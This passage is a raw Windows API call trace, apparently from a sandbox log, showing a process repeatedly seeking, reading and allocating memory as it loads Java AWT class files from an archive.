lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c670*=0x383, lpOverlapped=0x0) returned 1 [0130.198] malloc (_Size=0x48) returned 0x12e5f9c0 [0130.198] malloc (_Size=0xa0) returned 0x12dabc00 [0130.198] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410e24, lpNewFilePointer=0x208d800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d800*=54595108) returned 1 [0130.198] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7d0, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208d7d0*=0xa0, lpOverlapped=0x0) returned 1 [0130.198] malloc (_Size=0x25) returned 0x12dda860 [0130.199] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f955a2, lpNewFilePointer=0x208d400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d400*=49894818) returned 1 [0130.199] ReadFile (in: hFile=0x134, lpBuffer=0x208d450, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3d0, lpOverlapped=0x0 | out: lpBuffer=0x208d450*, lpNumberOfBytesRead=0x208d3d0*=0x1e, lpOverlapped=0x0) returned 1 [0130.200] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f955e4, lpNewFilePointer=0x208d460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d460*=49894884) returned 1 [0130.200] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x1444, lpNumberOfBytesRead=0x208d430, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208d430*=0x1444, lpOverlapped=0x0) returned 1 [0130.201] malloc (_Size=0x48) returned 0x12e5f880 [0130.201] malloc (_Size=0xa0) returned 0x12dabd60 [0130.201] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410dd2, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54595026) returned 1 [0130.201] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0130.201] malloc (_Size=0x25) returned 0x12ddab00 [0130.202] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f954dc, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=49894620) returned 1 [0130.202] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0130.202] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9551e, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=49894686) returned 1 [0130.202] ReadFile (in: hFile=0x134, lpBuffer=0x1227ba60, nNumberOfBytesToRead=0x84, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227ba60*, lpNumberOfBytesRead=0x208c970*=0x84, lpOverlapped=0x0) returned 1 [0130.202] malloc (_Size=0x48) returned 0x12e5fd30 [0130.202] malloc (_Size=0xa0) returned 0x12dab260 [0130.202] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410d82, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=54594946) returned 1 [0130.203] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208cd90*=0xa0, lpOverlapped=0x0) returned 1 [0130.203] malloc (_Size=0x23) returned 0x12ddac80 [0130.203] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f95117, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=49893655) returned 1 [0130.203] ReadFile (in: hFile=0x134, lpBuffer=0x208ca10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x208ca10*, lpNumberOfBytesRead=0x208c990*=0x1e, lpOverlapped=0x0) returned 1 [0130.203] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f95157, lpNewFilePointer=0x208ca20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca20*=49893719) returned 1 [0130.203] ReadFile (in: hFile=0x134, lpBuffer=0x1227ba60, nNumberOfBytesToRead=0x385, lpNumberOfBytesRead=0x208c9f0, lpOverlapped=0x0 | out: lpBuffer=0x1227ba60*, lpNumberOfBytesRead=0x208c9f0*=0x385, lpOverlapped=0x0) returned 1 [0130.204] malloc (_Size=0x48) returned 0x12e5f830 [0130.204] malloc (_Size=0xa0) returned 0x12dac650 [0130.204] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410d40, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=54594880) returned 1 [0130.204] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208c350*=0xa0, lpOverlapped=0x0) returned 1 [0130.204] malloc (_Size=0x15) returned 0x12f4eba0 [0130.204] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f947cd, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=49891277) returned 1 [0130.204] ReadFile (in: hFile=0x134, lpBuffer=0x208bfd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x208bfd0*, lpNumberOfBytesRead=0x208bf50*=0x1e, lpOverlapped=0x0) returned 1 [0130.205] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f947ff, lpNewFilePointer=0x208bfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfe0*=49891327) returned 1 [0130.205] ReadFile (in: hFile=0x134, lpBuffer=0x1227bf60, nNumberOfBytesToRead=0x918, lpNumberOfBytesRead=0x208bfb0, lpOverlapped=0x0 | out: lpBuffer=0x1227bf60*, lpNumberOfBytesRead=0x208bfb0*=0x918, lpOverlapped=0x0) returned 1 [0130.207] malloc (_Size=0x48) returned 0x12e5f010 [0130.207] malloc (_Size=0xa0) returned 0x12dac860 [0130.207] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410cf2, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=54594802) returned 1 [0130.208] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208c780*=0xa0, lpOverlapped=0x0) returned 1 [0130.208] malloc (_Size=0x21) returned 0x12dda8c0 [0130.208] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9456e, lpNewFilePointer=0x208c3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3b0*=49890670) returned 1 [0130.208] ReadFile (in: hFile=0x134, lpBuffer=0x208c400, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c380, lpOverlapped=0x0 | out: lpBuffer=0x208c400*, lpNumberOfBytesRead=0x208c380*=0x1e, lpOverlapped=0x0) returned 1 [0130.208] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f945ac, lpNewFilePointer=0x208c410, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c410*=49890732) returned 1 [0130.208] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x221, lpNumberOfBytesRead=0x208c3e0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208c3e0*=0x221, lpOverlapped=0x0) returned 1 [0130.210] malloc (_Size=0x48) returned 0x12e5f830 [0130.210] malloc (_Size=0xa0) returned 0x12daace0 [0130.210] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410cae, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=54594734) returned 1 [0130.210] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c780*=0xa0, lpOverlapped=0x0) returned 1 [0130.210] malloc (_Size=0x17) returned 0x12f4e5e0 [0130.211] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9430a, lpNewFilePointer=0x208c3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3b0*=49890058) returned 1 [0130.211] ReadFile (in: hFile=0x134, lpBuffer=0x208c400, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c380, lpOverlapped=0x0 | out: lpBuffer=0x208c400*, lpNumberOfBytesRead=0x208c380*=0x1e, lpOverlapped=0x0) returned 1 [0130.211] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9433e, lpNewFilePointer=0x208c410, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c410*=49890110) returned 1 [0130.211] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x230, lpNumberOfBytesRead=0x208c3e0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208c3e0*=0x230, lpOverlapped=0x0) returned 1 [0130.212] malloc (_Size=0x48) returned 0x12e600f0 [0130.212] malloc (_Size=0xa0) returned 0x12dab520 [0130.212] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410c50, lpNewFilePointer=0x208bd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd70*=54594640) returned 1 [0130.212] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd40, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208bd40*=0xa0, lpOverlapped=0x0) returned 1 [0130.212] malloc (_Size=0x31) returned 0x12ed5bb0 [0130.212] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9412f, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=49889583) returned 1 [0130.212] ReadFile (in: hFile=0x134, lpBuffer=0x208b9c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x208b9c0*, lpNumberOfBytesRead=0x208b940*=0x1e, lpOverlapped=0x0) returned 1 [0130.212] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9417d, lpNewFilePointer=0x208b9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9d0*=49889661) returned 1 [0130.213] ReadFile (in: hFile=0x134, lpBuffer=0x1227a610, nNumberOfBytesToRead=0x18d, lpNumberOfBytesRead=0x208b9a0, lpOverlapped=0x0 | out: lpBuffer=0x1227a610*, lpNumberOfBytesRead=0x208b9a0*=0x18d, lpOverlapped=0x0) returned 1 [0130.214] malloc (_Size=0x48) returned 0x12e5ff10 [0130.214] malloc (_Size=0xa0) returned 0x12dac650 [0130.214] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410c00, lpNewFilePointer=0x208c4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4f0*=54594560) returned 1 [0130.214] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4c0, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208c4c0*=0xa0, lpOverlapped=0x0) returned 1 [0130.214] malloc (_Size=0x23) returned 0x12ddab30 [0130.214] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f934ea, lpNewFilePointer=0x208c0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0f0*=49886442) returned 1 [0130.214] ReadFile (in: hFile=0x134, lpBuffer=0x208c140, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0c0, lpOverlapped=0x0 | out: lpBuffer=0x208c140*, lpNumberOfBytesRead=0x208c0c0*=0x1e, lpOverlapped=0x0) returned 1 [0130.215] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9352a, lpNewFilePointer=0x208c150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c150*=49886506) returned 1 [0130.215] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xc05, lpNumberOfBytesRead=0x208c120, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c120*=0xc05, lpOverlapped=0x0) returned 1 [0130.216] malloc (_Size=0x48) returned 0x12e5f420 [0130.216] malloc (_Size=0xa0) returned 0x12daafa0 [0130.216] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410ba8, lpNewFilePointer=0x208d800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d800*=54594472) returned 1 [0130.216] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7d0, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x208d7d0*=0xa0, lpOverlapped=0x0) returned 1 [0130.216] malloc (_Size=0x2b) returned 0x12ed5bb0 [0130.216] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f925b0, lpNewFilePointer=0x208d400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d400*=49882544) returned 1 [0130.216] ReadFile (in: hFile=0x134, lpBuffer=0x208d450, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3d0, lpOverlapped=0x0 | out: lpBuffer=0x208d450*, lpNumberOfBytesRead=0x208d3d0*=0x1e, lpOverlapped=0x0) returned 1 [0130.217] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f925f8, lpNewFilePointer=0x208d460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d460*=49882616) returned 1 [0130.217] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xef2, lpNumberOfBytesRead=0x208d430, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208d430*=0xef2, lpOverlapped=0x0) returned 1 [0130.217] malloc (_Size=0x48) returned 0x12e5f9c0 [0130.217] malloc (_Size=0xa0) returned 0x12dabd60 [0130.218] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412a27, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54602279) returned 1 [0130.218] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0130.218] malloc (_Size=0x25) returned 0x12dda740 [0130.218] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fd0d9c, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=50138524) returned 1 [0130.218] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0130.218] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fd0dde, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=50138590) returned 1 [0130.219] ReadFile (in: hFile=0x134, lpBuffer=0x1227b510, nNumberOfBytesToRead=0xa9, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227b510*, lpNumberOfBytesRead=0x208c970*=0xa9, lpOverlapped=0x0) returned 1 [0130.219] malloc (_Size=0x48) returned 0x12e600f0 [0130.219] malloc (_Size=0xa0) returned 0x12daace0 [0130.219] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34137ee, lpNewFilePointer=0x208c280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c280*=54605806) returned 1 [0130.219] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c250, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c250*=0xa0, lpOverlapped=0x0) returned 1 [0130.219] malloc (_Size=0x1e) returned 0x12ddab60 [0130.220] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff9808, lpNewFilePointer=0x208be80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be80*=50305032) returned 1 [0130.220] ReadFile (in: hFile=0x134, lpBuffer=0x208bed0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be50, lpOverlapped=0x0 | out: lpBuffer=0x208bed0*, lpNumberOfBytesRead=0x208be50*=0x1e, lpOverlapped=0x0) returned 1 [0130.220] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff9843, lpNewFilePointer=0x208bee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bee0*=50305091) returned 1 [0130.220] ReadFile (in: hFile=0x134, lpBuffer=0x1227b750, nNumberOfBytesToRead=0x4b, lpNumberOfBytesRead=0x208beb0, lpOverlapped=0x0 | out: lpBuffer=0x1227b750*, lpNumberOfBytesRead=0x208beb0*=0x4b, lpOverlapped=0x0) returned 1 [0130.222] malloc (_Size=0x48) returned 0x12e5f600 [0130.222] malloc (_Size=0xa0) returned 0x12dab520 [0130.222] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341785b, lpNewFilePointer=0x208d800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d800*=54622299) returned 1 [0130.222] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7d0, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208d7d0*=0xa0, lpOverlapped=0x0) returned 1 [0130.223] malloc (_Size=0x19) returned 0x12dda8c0 [0130.223] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30bc180, lpNewFilePointer=0x208d400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d400*=51102080) returned 1 [0130.223] ReadFile (in: hFile=0x134, lpBuffer=0x208d450, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3d0, lpOverlapped=0x0 | out: lpBuffer=0x208d450*, lpNumberOfBytesRead=0x208d3d0*=0x1e, lpOverlapped=0x0) returned 1 [0130.224] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30bc1b6, lpNewFilePointer=0x208d460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d460*=51102134) returned 1 [0130.224] ReadFile (in: hFile=0x134, lpBuffer=0x12de3e10, nNumberOfBytesToRead=0x1183e, lpNumberOfBytesRead=0x208d430, lpOverlapped=0x0 | out: lpBuffer=0x12de3e10*, lpNumberOfBytesRead=0x208d430*=0x1183e, lpOverlapped=0x0) returned 1 [0130.228] malloc (_Size=0x48) returned 0x12e5eed0 [0130.228] malloc (_Size=0xa0) returned 0x12dac390 [0130.228] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341780b, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54622219) returned 1 [0130.228] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0130.228] malloc (_Size=0x23) returned 0x12ddb1c0 [0130.229] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30bbfb4, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=51101620) returned 1 [0130.229] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0130.229] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30bbff4, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=51101684) returned 1 [0130.229] ReadFile (in: hFile=0x134, lpBuffer=0x1227a610, nNumberOfBytesToRead=0x18c, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227a610*, lpNumberOfBytesRead=0x208c970*=0x18c, lpOverlapped=0x0) returned 1 [0130.229] malloc (_Size=0x48) returned 0x12e5fb00 [0130.229] malloc (_Size=0xa0) returned 0x12daace0 [0130.229] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34177c1, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54622145) returned 1 [0130.230] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0130.230] malloc (_Size=0x1d) returned 0x12ddaaa0 [0130.230] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30bbe5d, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=51101277) returned 1 [0130.230] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0130.230] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30bbe97, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=51101335) returned 1 [0130.230] ReadFile (in: hFile=0x134, lpBuffer=0x1227a600, nNumberOfBytesToRead=0x11d, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227a600*, lpNumberOfBytesRead=0x208c970*=0x11d, lpOverlapped=0x0) returned 1 [0130.233] malloc (_Size=0x48) returned 0x12e5fa10 [0130.233] malloc (_Size=0xa0) returned 0x12dab260 [0130.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416d95, lpNewFilePointer=0x208caa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caa0*=54619541) returned 1 [0130.233] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca70, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208ca70*=0xa0, lpOverlapped=0x0) returned 1 [0130.233] malloc (_Size=0x25) returned 0x12ddaa40 [0130.234] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x309c8e1, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50972897) returned 1 [0130.234] ReadFile (in: hFile=0x134, lpBuffer=0x208c6f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x208c6f0*, lpNumberOfBytesRead=0x208c670*=0x1e, lpOverlapped=0x0) returned 1 [0130.234] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x309c923, lpNewFilePointer=0x208c700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c700*=50972963) returned 1 [0130.234] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0xd6, lpNumberOfBytesRead=0x208c6d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208c6d0*=0xd6, lpOverlapped=0x0) returned 1 [0130.236] strlen (_Str="java/awt/event/InputEvent.class") returned 0x1f [0130.236] malloc (_Size=0x48) returned 0x12e5fab0 [0130.236] malloc (_Size=0xa0) returned 0x12daaef0 [0130.236] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34141f5, lpNewFilePointer=0x208d0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0c0*=54608373) returned 1 [0130.236] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d090, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208d090*=0xa0, lpOverlapped=0x0) returned 1 [0130.236] malloc (_Size=0x20) returned 0x12dda8c0 [0130.236] strlen (_Str="java/awt/event/InputEvent.class") returned 0x1f [0130.236] strcpy (in: _Dest=0x208d240, _Source="java/awt/event/InputEvent.class" | out: _Dest="java/awt/event/InputEvent.class") returned="java/awt/event/InputEvent.class" [0130.236] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301a9c6, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=50440646) returned 1 [0130.236] ReadFile (in: hFile=0x134, lpBuffer=0x208cd10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x208cd10*, lpNumberOfBytesRead=0x208cc90*=0x1e, lpOverlapped=0x0) returned 1 [0130.242] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301aa03, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=50440707) returned 1 [0130.242] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x128c, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208ccf0*=0x128c, lpOverlapped=0x0) returned 1 [0130.242] free (_Block=0x12ddaa40) [0130.242] free (_Block=0x12e5fa10) [0130.247] strlen (_Str="java/awt/event/ComponentEvent.class") returned 0x23 [0130.247] malloc (_Size=0x48) returned 0x12e5ed90 [0130.247] malloc (_Size=0xa0) returned 0x12daaef0 [0130.247] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34141a4, lpNewFilePointer=0x208c680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c680*=54608292) returned 1 [0130.247] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c650, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c650*=0xa0, lpOverlapped=0x0) returned 1 [0130.250] malloc (_Size=0x24) returned 0x12dda860 [0130.250] strlen (_Str="java/awt/event/ComponentEvent.class") returned 0x23 [0130.250] strcpy (in: _Dest=0x208c800, _Source="java/awt/event/ComponentEvent.class" | out: _Dest="java/awt/event/ComponentEvent.class") returned="java/awt/event/ComponentEvent.class" [0130.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301a3f4, lpNewFilePointer=0x208c280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c280*=50439156) returned 1 [0130.251] ReadFile (in: hFile=0x134, lpBuffer=0x208c2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c250, lpOverlapped=0x0 | out: lpBuffer=0x208c2d0*, lpNumberOfBytesRead=0x208c250*=0x1e, lpOverlapped=0x0) returned 1 [0130.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301a435, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=50439221) returned 1 [0130.251] ReadFile (in: hFile=0x134, lpBuffer=0x12e4c450, nNumberOfBytesToRead=0x591, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x12e4c450*, lpNumberOfBytesRead=0x208c2b0*=0x591, lpOverlapped=0x0) returned 1 [0130.252] free (_Block=0x12dda8c0) [0130.252] free (_Block=0x12e5fab0) [0130.254] strlen (_Str="java/awt/AWTEvent.class") returned 0x17 [0130.254] malloc (_Size=0x48) returned 0x12e5f920 [0130.254] malloc (_Size=0xa0) returned 0x12dabf70 [0130.254] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341415f, lpNewFilePointer=0x208bc40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc40*=54608223) returned 1 [0130.254] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc10, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, 